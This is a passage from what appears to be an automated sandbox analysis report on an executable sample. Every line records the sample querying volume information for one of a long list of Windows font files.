        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\DUBAI-REGULAR.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\DUBAI-MEDIUM.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\DUBAI-LIGHT.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\DUBAI-BOLD.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
